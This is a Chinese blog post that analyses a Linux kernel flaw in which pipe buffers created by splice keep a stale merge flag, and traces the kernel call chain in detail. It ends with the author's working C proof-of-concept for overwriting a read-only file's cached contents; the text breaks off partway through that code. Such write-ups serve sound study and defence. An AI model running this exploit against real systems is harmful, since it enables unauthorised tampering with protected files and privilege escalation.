在一切开始之前

file相关

文件结构体代表一个打开的文件,系统中的每个打开的文件在内核空间都有一个关联的 struct file。它由内核在打开文件时创建,并传递给在文件上进行操作的任何函数。在文件的所有实例都关闭后,内核释放这个数据结构。在内核创建和驱动源码中,struct file的指针通常被命名为file或filp。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

/*
 * struct file - in-kernel object describing one open file.
 *
 * Per the surrounding text: the kernel creates it when a file is opened,
 * passes it to every function operating on that file, and releases it after
 * all instances of the file have been closed.
 */
struct file {
union {
struct llist_node fu_llist;
struct rcu_head fu_rcuhead;
} f_u;
struct path f_path;
struct inode *f_inode; /* cached value */
const struct file_operations *f_op;

/*
* Protects f_ep, f_flags.
* Must not be taken from IRQ context.
*/
spinlock_t f_lock;
enum rw_hint f_write_hint;
atomic_long_t f_count;
unsigned int f_flags;
fmode_t f_mode;
struct mutex f_pos_lock;
loff_t f_pos;
struct fown_struct f_owner;
const struct cred *f_cred;
struct file_ra_state f_ra;

u64 f_version;
#ifdef CONFIG_SECURITY
void *f_security;
#endif
/* needed for tty driver, and maybe others */
void *private_data;

#ifdef CONFIG_EPOLL
/* Used by fs/eventpoll.c to link all the hooks to this file */
struct hlist_head *f_ep;
#endif /* #ifdef CONFIG_EPOLL */
struct address_space *f_mapping;
/*
 * Points to the address-space mapping of the inode associated with this
 * file; normally set to inode->i_mapping. Fetching data from the physical
 * device on every read or write would be slow, so the kernel gives each file
 * an address space that serves as its data cache. Reads and writes operate on
 * that cache, and the kernel's synchronization mechanism writes dirty pages
 * back to the device.
 */

errseq_t f_wb_err;
errseq_t f_sb_err; /* for syncfs */
} __randomize_layout
__attribute__((aligned(4))); /* lest something weird decides that 2 is OK */

f_mapping 字段的类型为 address_space 结构

1
2
3
4
5
6
/*
 * struct address_space (excerpt; remaining members elided with "...").
 * Among other things it holds the page cache of the file that owns it.
 */
struct address_space {
struct inode *host; /* owner: inode, block_device */
struct radix_tree_root page_tree; /* radix tree of all pages */
rwlock_t tree_lock; /* and rwlock protecting it */
...
}

address_space 结构其中的一个作用就是用于存储文件的 页缓存,下面介绍一下各个字段的作用:

  • host:指向当前 address_space 对象所属的文件 inode 对象(每个文件都使用一个 inode 对象表示)。
  • page_tree:用于存储当前文件的 页缓存
  • tree_lock:用于防止并发访问 page_tree 导致的资源竞争问题。

一个比较形象的图

img

inode ,即虚拟文件节点,VFS inode 包含文件访问权限、属主、组、大小、生成时间、访问时间、最后修改时间等信息。它是Linux 管理文件系统的最基本单位,也是文件系统连接任何子目录、文件的桥梁。 内核使用inode结构体在内核内部表示一个文件。因此,它与表示一个已经打开的文件描述符的结构体(即file 文件结构)是不同的,我们可以使用多个file 文件结构表示同一个文件的多个文件描述符,但此时,所有的这些file文件结构全部都必须只能指向一个inode结构体

管道相关

管道是Linux中IPC的常用方法,拥有一个读端和一个写端,两个程序之间可以通过这种方法实现通信。而在内核中,为了实现这种通信,需要维护一个环形缓冲区结构,即pipe_buffer

具体的,在do_pipe()函数中 最终调用了alloc_pipe_info 来分配这种结构体

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/*
 * alloc_pipe_info - allocate a pipe_inode_info together with its array of
 * pipe_buffer slots (excerpt; the failure/cleanup paths are elided with "...").
 *
 * Returns the initialized pipe on the success path shown here.
 */
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;


struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);

pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
// allocate the pipe_inode_info itself (zero-filled)
if (pipe == NULL)
goto out_free_uid;

/* Shrink the default slot count when it would exceed pipe_max_size. */
if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
pipe_bufs = max_size >> PAGE_SHIFT;

user_bufs = account_pipe_buffers(user, 0, pipe_bufs);

/* Over the soft limit: fall back to PIPE_MIN_DEF_BUFFERS slots. */
if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) {
user_bufs = account_pipe_buffers(user, pipe_bufs, PIPE_MIN_DEF_BUFFERS);
pipe_bufs = PIPE_MIN_DEF_BUFFERS;
}

if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user())
goto out_revert_acct;

pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);
// allocate the pipe_buffer array (zero-filled by kcalloc)
if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}
...
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/* Default number of pipe_buffer slots requested by alloc_pipe_info(). */
#define PIPE_DEF_BUFFERS	16
/*
 * struct pipe_buffer - one slot of a pipe's buffer array.
 * Each slot references a page plus the offset/length of the data inside it.
 */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags; /* e.g. PIPE_BUF_FLAG_CAN_MERGE / PIPE_BUF_FLAG_PACKET, see pipe_write() */
unsigned long private;
};
/*
 * struct pipe_inode_info - per-pipe bookkeeping.
 * Owns the array of pipe_buffer slots (bufs); head and tail are the indices
 * the article describes as maintaining that array as a ring.
 */
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
unsigned int head;
unsigned int tail;
unsigned int max_usage;
unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
unsigned int poll_usage;
struct page *tmp_page;
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs; // array of pipe_buffer slots
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};

也就是说pipe 由 pipe_inode_info 结构体管理着16个pipe_buffer结构体,每个pipe_buffer结构体指向一个缓冲页,事实上,这还是一个环形的缓冲区,由head 和tail 两个指针来维护。

1-pipe_buffer

零拷贝

以socket读写为例,传统IO的执行流往往是这样

img

有两次非常多余的上下文切换操作

Linux 在 2.6.17 版本引入 splice 系统调用,不仅不需要硬件支持,还实现了两个文件描述符之间的数据零拷贝。splice 的伪代码如下:

1
splice(fd_in, off_in, fd_out, off_out, len, flags);

splice 系统调用可以在内核空间的读缓冲区(read buffer)和网络缓冲区(socket buffer)之间建立管道(pipeline),从而避免了两者之间的 CPU 拷贝操作。

img

基于 splice 系统调用的零拷贝方式,整个拷贝过程会发生 2 次上下文切换,0 次 CPU 拷贝以及 2 次 DMA 拷贝,用户程序读写数据的流程如下:

  1. 用户进程通过 splice() 函数向内核(kernel)发起系统调用,上下文从用户态(user space)切换为内核态(kernel space)。
  2. CPU 利用 DMA 控制器将数据从主存或硬盘拷贝到内核空间(kernel space)的读缓冲区(read buffer)。
  3. CPU 在内核空间的读缓冲区(read buffer)和网络缓冲区(socket buffer)之间建立管道(pipeline)。
  4. CPU 利用 DMA 控制器将数据从网络缓冲区(socket buffer)拷贝到网卡进行数据传输。
  5. 上下文从内核态(kernel space)切换回用户态(user space),splice 系统调用执行返回。

splice 拷贝方式也同样存在用户程序不能对数据进行修改的问题。除此之外,它使用了 Linux 的管道缓冲机制,可以用于任意两个文件描述符中传输数据,但是它的两个文件描述符参数中有一个必须是管道设备。

为什么是0次cpu拷贝呢,其实就是两个设备共用了同一个缓冲区,具体来讲,就是pipe_buffer所对应的page 直接指向了写文件的 page cache,这样管道读的话就是直接从page cache 读了,没有cpu拷贝操作。

函数流程分析

pipe_write()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
/*
 * pipe_write - write the data described by @from into the pipe behind
 * @iocb->ki_filp (excerpt; the blocking/wake-up tail is elided with "...").
 *
 * Two phases are visible here:
 *   1. if the pipe is not empty and the most recent buffer carries
 *      PIPE_BUF_FLAG_CAN_MERGE, the sub-page remainder of the data is appended
 *      to that buffer's page;
 *   2. whatever is left is copied into freshly claimed slots, one page each.
 */
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;

/* Null write succeeds. */
if (unlikely(total_len == 0))
return 0;

__pipe_lock(pipe);

if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}

#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue) {
ret = -EXDEV;
goto out;
}
#endif

/*
* If it wasn't empty we try to merge new data into
* the last buffer.
*
* That naturally merges small writes, but it also
* page-aligns the rest of the writes for large writes
* spanning multiple pages.
*/
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
// i.e. total_len modulo PAGE_SIZE: chars is the sub-page remainder

if (chars && !was_empty) {// length is not a multiple of the page size and the pipe is not empty
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
// the slot just before head, i.e. the most recently filled buffer
int offset = buf->offset + buf->len;

if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
// the buffer has PIPE_BUF_FLAG_CAN_MERGE set
// and the sub-page remainder still fits into its page
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;

ret = copy_page_from_iter(buf->page, offset, chars, from);
// ret is the number of bytes copied
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}

buf->len += ret;
if (!iov_iter_count(from))// nothing left to write: finish
goto out;
}
}
// reached when nothing could be merged, or when data remains after the merge
for (;;) {
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}

head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
// the pipe is not full, so another slot can be written
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
// slot at head
struct page *page = pipe->tmp_page;
int copied;

if (!page) {
// no cached spare page: allocate a new one
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}

/*
 * Claim a slot in the ring up front and attach an empty buffer to it.
 * If we fault or cannot use it, either a reader will consume it or it
 * will still be there for the next write.
 */
spin_lock_irq(&pipe->rd_wait.lock);// spinlock of the reader wait queue

head = pipe->head;
if (pipe_full(head, pipe->tail, pipe->max_usage)) {
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}

pipe->head = head + 1;// advance head to the next slot
spin_unlock_irq(&pipe->rd_wait.lock);// release the lock

/* Install the page in the buffer array. */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
if (is_packetized(filp))
/*
 * Checks whether the file's flags include O_DIRECT. The article marks
 * this flag assignment as a key point of the vulnerability.
 */

buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
// O_DIRECT not set: the buffer is marked PIPE_BUF_FLAG_CAN_MERGE
pipe->tmp_page = NULL;

copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
// copy the caller's data into the new page
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;

if (!iov_iter_count(from))
break;
}

if (!pipe_full(head, pipe->tail, pipe->max_usage))
continue;

/* Wait for buffer space to become available. */
if (filp->f_flags & O_NONBLOCK) {
if (!ret)
ret = -EAGAIN;
break;
}
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}
...
}
}

is_packetized()

判断flags位的 O_DIRECT

1
2
3
4
5
/* Returns non-zero when @file's f_flags contain O_DIRECT, zero otherwise. */
static inline int is_packetized(struct file *file)
{
return (file->f_flags & O_DIRECT) != 0;
}

splice()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
/*
 * do_splice - excerpt showing only the branch where the output side is a pipe
 * (other branches and the end of the function are elided).
 *
 * Returns -EBADF when @in is not open for reading or @out not for writing.
 */
long do_splice(struct file *in, loff_t *off_in, struct file *out,
loff_t *off_out, size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
long ret;

if (unlikely(!(in->f_mode & FMODE_READ) ||
!(out->f_mode & FMODE_WRITE)))
return -EBADF;

ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
...
if (ipipe) {
...
}
if (opipe){
/* An explicit offset for the pipe side is rejected. */
if (off_out)
return -ESPIPE;
if (off_in) {
if (!(in->f_mode & FMODE_PREAD))
return -EINVAL;
offset = *off_in;
} else {
offset = in->f_pos;
}

if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

ret = splice_file_to_pipe(in, opipe, &offset, len, flags);// the pipe is the output side, so this path is taken
/* Store the updated offset where the starting offset came from. */
if (!off_in)
in->f_pos = offset;
else
*off_in = offset;

return ret;
}


/*
 * splice_file_to_pipe - with @opipe locked, wait for space and then splice
 * from @in into the pipe via do_splice_to().
 *
 * Returns the result of wait_for_space() if it is non-zero, otherwise the
 * result of do_splice_to(). Readers are woken when the result is positive.
 */
long splice_file_to_pipe(struct file *in,
struct pipe_inode_info *opipe,
loff_t *offset,
size_t len, unsigned int flags)
{
long ret;

pipe_lock(opipe);
ret = wait_for_space(opipe, flags);
if (!ret)
ret = do_splice_to(in, offset, opipe, len, flags);// next step of the call chain
pipe_unlock(opipe);
if (ret > 0)
wakeup_pipe_readers(opipe);
return ret;
}

/*
 * do_splice_to - clamp @len to the free space in @pipe, validate the read
 * range, and dispatch to the file's ->splice_read method.
 *
 * Returns -EBADF if @in is not readable, a negative rw_verify_area() result,
 * the result of warn_unsupported() when no ->splice_read exists, or whatever
 * ->splice_read returns.
 */
static long do_splice_to(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
unsigned int p_space;
int ret;

if (unlikely(!(in->f_mode & FMODE_READ)))
return -EBADF;

/* Don't try to read more the pipe has space for. */
p_space = pipe->max_usage - pipe_occupancy(pipe->head, pipe->tail);
len = min_t(size_t, len, p_space << PAGE_SHIFT);

ret = rw_verify_area(READ, in, ppos, len);
if (unlikely(ret < 0))
return ret;

if (unlikely(len > MAX_RW_COUNT))
len = MAX_RW_COUNT;

if (unlikely(!in->f_op->splice_read))
return warn_unsupported(in, "read");
return in->f_op->splice_read(in, ppos, pipe, len, flags);// dispatch to the file's splice_read method
}

read方法具体与文件系统有关,以ext4为例子的话就是

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
/* file_operations table for ext4 regular files, as quoted by the article. */
const struct file_operations ext4_file_operations = {
.llseek = ext4_llseek,
.read_iter = ext4_file_read_iter,// also reached later in this call chain
.write_iter = ext4_file_write_iter,
.iopoll = iocb_bio_iopoll,
.unlocked_ioctl = ext4_ioctl,
#ifdef CONFIG_COMPAT
.compat_ioctl = ext4_compat_ioctl,
#endif
.mmap = ext4_file_mmap,
.mmap_supported_flags = MAP_SYNC,
.open = ext4_file_open,
.release = ext4_release_file,
.fsync = ext4_sync_file,
.get_unmapped_area = thp_get_unmapped_area,
.splice_read = generic_file_splice_read,// <-- the splice_read followed in this walkthrough
.splice_write = iter_file_splice_write,
.fallocate = ext4_fallocate,
};

/*
 * generic_file_splice_read - build a pipe-backed iov_iter and a kiocb for
 * @in, then invoke the file's read_iter on them (excerpt; tail elided).
 */
ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
struct iov_iter to;
struct kiocb kiocb;
unsigned int i_head;
int ret;

iov_iter_pipe(&to, READ, pipe, len);
i_head = to.head;
init_sync_kiocb(&kiocb, in);// records the file in the kiocb; from here on the kiocb stands for the regular file being read
kiocb.ki_pos = *ppos;
ret = call_read_iter(in, &kiocb, &to);// calls the read_iter defined by the file system in use
...
}

/*
 * ext4_file_read_iter - ext4's read_iter: picks the DAX, direct-I/O or
 * generic read path for the file behind @iocb.
 *
 * Returns -EIO after a forced shutdown, 0 when @to has no room, otherwise the
 * result of the selected read path.
 */
static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
{
struct inode *inode = file_inode(iocb->ki_filp);

if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
return -EIO;

if (!iov_iter_count(to))
return 0; /* skip atime */

#ifdef CONFIG_FS_DAX
if (IS_DAX(inode))
return ext4_dax_read_iter(iocb, to);
#endif
if (iocb->ki_flags & IOCB_DIRECT)// not set in the scenario discussed here
return ext4_dio_read_iter(iocb, to);

return generic_file_read_iter(iocb, to);// this path is taken
}

/*
 * generic_file_read_iter - excerpt: apart from the elided IOCB_DIRECT
 * handling, the read is forwarded to filemap_read().
 */
ssize_t
generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
{
size_t count = iov_iter_count(iter);
ssize_t retval = 0;
...
if (iocb->ki_flags & IOCB_DIRECT) {
...
/*
 * various checks (elided)
 */
}
return filemap_read(iocb, iter, retval);
}

/*
 * filemap_read - excerpt: fetch pages for the file behind @iocb into a
 * pagevec and pass each of them to copy_page_to_iter().
 * Large parts are elided with "...", so the braces shown do not balance.
 */
ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
ssize_t already_read)
{
struct file *filp = iocb->ki_filp;
struct file_ra_state *ra = &filp->f_ra;
struct address_space *mapping = filp->f_mapping;
struct inode *inode = mapping->host;
struct pagevec pvec;
...
do {
cond_resched();
...

error = filemap_get_pages(iocb, iter, &pvec);// fills pvec; as noted earlier, iocb stands for the input file, so this effectively fetches its page-cache pages
/*
 * Internally this does:
 * struct address_space *mapping = filp->f_mapping;
 * filemap_get_read_batch(mapping, index, last_index, pvec);
 * so that the array inside pvec points at page-cache pages.
 */

for (i = 0; i < pagevec_count(&pvec); i++) {
struct page *page = pvec.pages[i];// a page-cache page
size_t page_size = thp_size(page);
size_t offset = iocb->ki_pos & (page_size - 1);
size_t bytes = min_t(loff_t, end_offset - iocb->ki_pos,
page_size - offset);
size_t copied;
...
copied = copy_page_to_iter(page, offset, bytes, iter);// this is where the page gets associated with the pipe buffer
...
}while (iov_iter_count(iter) && iocb->ki_pos < isize && !error);
...
}

/*
 * copy_page_to_iter - hand @bytes bytes starting at @offset within @page to
 * iterator @i, one PAGE_SIZE-bounded piece at a time.
 *
 * Returns the total number of bytes accepted; 0 if page_copy_sane() rejects
 * the request. Stops early when a piece transfers nothing.
 */
size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
size_t res = 0;
if (unlikely(!page_copy_sane(page, offset, bytes)))
return 0;
page += offset / PAGE_SIZE; // first subpage
offset %= PAGE_SIZE;
while (1) {
size_t n = __copy_page_to_iter(page, offset,
min(bytes, (size_t)PAGE_SIZE - offset), i);// the real work is done by __copy_page_to_iter()
res += n;
bytes -= n;
if (!bytes || !n)
break;
offset += n;
/* Finished this subpage: continue at the start of the next one. */
if (offset == PAGE_SIZE) {
page++;
offset = 0;
}
}
return res;
}

/*
 * __copy_page_to_iter - dispatch a single-page transfer according to the
 * kind of iterator @i is (iovec, bvec/kvec/xarray, pipe or discard).
 *
 * Returns the number of bytes handled; 0 (after WARN_ON) for any other kind.
 */
static size_t __copy_page_to_iter(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
if (likely(iter_is_iovec(i)))
return copy_page_to_iter_iovec(page, offset, bytes, i);
if (iov_iter_is_bvec(i) || iov_iter_is_kvec(i) || iov_iter_is_xarray(i)) {
void *kaddr = kmap_local_page(page);
size_t wanted = _copy_to_iter(kaddr + offset, bytes, i);
kunmap_local(kaddr);
return wanted;
}
if (iov_iter_is_pipe(i))// file-to-pipe transfer: this is the branch taken
return copy_page_to_iter_pipe(page, offset, bytes, i);
if (unlikely(iov_iter_is_discard(i))) {
if (unlikely(i->count < bytes))
bytes = i->count;
i->count -= bytes;
return bytes;
}
WARN_ON(1);
return 0;
}


pagevec结构体

管理着一个page指针数组,在该版本内核中PAGEVEC_SIZE大小为15

1
2
3
4
5
/* struct pagevec - small fixed-size batch of page pointers. */
struct pagevec {
unsigned char nr;
bool percpu_pvec_drained;
struct page *pages[PAGEVEC_SIZE];
};

最终到达copy_page_to_iter_pipe()函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
/*
 * copy_page_to_iter_pipe - attach @page to the pipe behind iterator @i
 * instead of copying its contents: a pipe_buffer slot is pointed at the page
 * with the given @offset and @bytes.
 *
 * Returns the number of bytes accounted, or 0 when there is nothing to do,
 * the iterator fails sanity(), or the pipe is full.
 *
 * This is the vulnerable version quoted by the article: page, offset, len and
 * ops are assigned for the slot, but flags is not.
 */
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;

if (unlikely(bytes > i->count))
bytes = i->count;

if (unlikely(!bytes))
return 0;

if (!sanity(i))
return 0;

off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];// slot at the iterator's head
if (off) {
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;

buf->ops = &page_cache_pipe_buf_ops;
get_page(page);// take an extra reference on the page
/*
 * This ends up calling:
 * static inline void page_ref_inc(struct page *page)
 * {
 * atomic_inc(&page->_refcount);
 * if (page_ref_tracepoint_active(page_ref_mod))
 * __page_ref_mod(page, 1);
 * }
 */


buf->page = page;
buf->offset = offset;
buf->len = bytes;
// vulnerability: buf->flags is not initialized here

pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}

漏洞分析

  1. 从文件到管道调用的splice()函数调用中,pipe buffer 关联page的时候没有对flag进行初始化
  2. 在调用pipe的write操作时,若我们没有设置O_DIRECT,则会设置PIPE_BUF_FLAG_CAN_MERGE
  3. 在调用pipe的write操作时,若上一个被写入的pipe_buffer设置了PIPE_BUF_FLAG_CAN_MERGE,且数据(不足一页大小的部分)足以写入该buffer对应的页,则可以继续写入当前页(即上一个被写入数据的buffer),这就是所谓的MERGE操作。接下来开始对新的 buffer 进行数据写入,若没有PIPE_BUF_FLAG_CAN_MERGE 标志位则分配新页面后写入

​ 我们可以先在不设置O_DIRECT的情况下初始化管道,并把管道写满后再全部读出,这样子就让所有pipe_buffer都保留了PIPE_BUF_FLAG_CAN_MERGE 标志位。

紧接着我们使用splice函数,读取任意字节(小于一页但至少一字节),使得管道pipe_buffer直接关联文件缓存页,但该函数又不对pipe_buffer的flags进行任何初始化。

此时我们再调用pipe的write操作,由于flag包含了PIPE_BUF_FLAG_CAN_MERGE标志,故write会对当前页,也就是splice read的文件缓存页,直接进行写入,这样我们就完成了越权写操作。

该漏洞的发现者自己公布了poc和exp,在这里放一下我复现的poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#include <unistd.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
/*
 * Reproduction program for the pipe-buffer flag issue analysed in this
 * article.
 *
 * Usage: PROG FILEPATH EVILDATA OFFSET
 *
 *   FILEPATH  file to target (opened read-only)
 *   EVILDATA  bytes to place into the file's cached page
 *   OFFSET    byte offset inside the file where EVILDATA should start
 *
 * Exit status is 0 on success and 1 on any validation or system-call failure.
 *
 * Constraints enforced up front (each would otherwise make the run silently
 * do nothing while still reporting success):
 *   - OFFSET must not sit on a page boundary, because one byte at OFFSET-1 is
 *     spliced first and has to live on the same page as the target;
 *   - EVILDATA must not cross a page boundary, because pipe_write() only
 *     merges when the data fits into the remainder of the current page;
 *   - the write must stay inside the existing file size.
 */
int main(int argc, char** argv, char** envp) {
	(void)envp; /* unused; kept so the signature stays unchanged */

	if (argc != 4) {
		printf("Usage : %s FILEPATH EVILDATA OFFSET\n", argv[0]);
		exit(1);
	}

	char *filename = argv[1];
	char *evildata = argv[2];
	const long data_size = (long)strlen(evildata);
	const long page_size = (long)PAGE_SIZE;

	/* Parse OFFSET strictly: reject empty input, trailing junk and negatives. */
	char *endp = NULL;
	long offset = strtol(argv[3], &endp, 0);
	if (endp == argv[3] || *endp != '\0' || offset < 0) {
		printf("[x] offset error!\n");
		exit(1);
	}
	if (offset % page_size == 0) {
		printf("[x] Sorry, cannot start writing at a page boundary\n");
		exit(1);
	}
	if (data_size > page_size - offset % page_size) {
		printf("[x] Sorry, cannot write across a page boundary\n");
		exit(1);
	}

	int fd = open(filename, O_RDONLY);
	if (fd < 0) {
		printf("[x] open failed!\n");
		exit(1);
	}

	struct stat st;
	if (fstat(fd, &st)) {
		printf("[x] stat failed\n");
		exit(1);
	}
	if (offset > st.st_size) {
		printf("[x] Offset is not inside the file\n");
		exit(1);
	}
	/* Compared as "size > room left" so offset + data_size cannot overflow. */
	if (data_size > st.st_size - offset) {
		printf("[x] Sorry, cannot enlarge the file\n");
		exit(1);
	}

	int p[2];
	if (pipe(p)) {
		printf("[x] pipe failed!\n");
		exit(1);
	}

	int pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	if (pipe_size <= 0) {
		printf("[x] F_GETPIPE_SZ failed!\n");
		exit(1);
	}

	/* Zero-filled so no indeterminate stack bytes are ever written out. */
	char buf[4096] = {0};

	/* Fill the pipe so that every buffer gets PIPE_BUF_FLAG_CAN_MERGE. */
	for (int remaining = pipe_size; remaining > 0;) {
		size_t chunk = (size_t)remaining > sizeof(buf) ? sizeof(buf) : (size_t)remaining;
		ssize_t done = write(p[1], buf, chunk);
		if (done <= 0) {
			/* Without this check a -1 would grow `remaining` forever. */
			printf("[x] pipe fill failed!\n");
			exit(1);
		}
		remaining -= (int)done;
	}

	/* Drain the pipe; the buffers keep PIPE_BUF_FLAG_CAN_MERGE afterwards. */
	for (int remaining = pipe_size; remaining > 0;) {
		size_t chunk = (size_t)remaining > sizeof(buf) ? sizeof(buf) : (size_t)remaining;
		ssize_t done = read(p[0], buf, chunk);
		if (done <= 0) {
			printf("[x] pipe drain failed!\n");
			exit(1);
		}
		remaining -= (int)done;
	}
	printf("[+] Initial pipe done!\n");

	/*
	 * Splice the single byte just before the target offset into the pipe.
	 * NOTE(review): splice() takes loff_t *; `long` matches that only on LP64
	 * targets - switch to loff_t if 32-bit builds ever matter.
	 */
	offset -= 1;
	ssize_t n = splice(fd, &offset, p[1], NULL, 1, 0);
	if (n <= 0) {
		/* Covers both an error (-1) and a short splice (0). */
		printf("[x] splice failed!\n");
		exit(1);
	}

	n = write(p[1], evildata, (size_t)data_size);
	if (n < 0) {
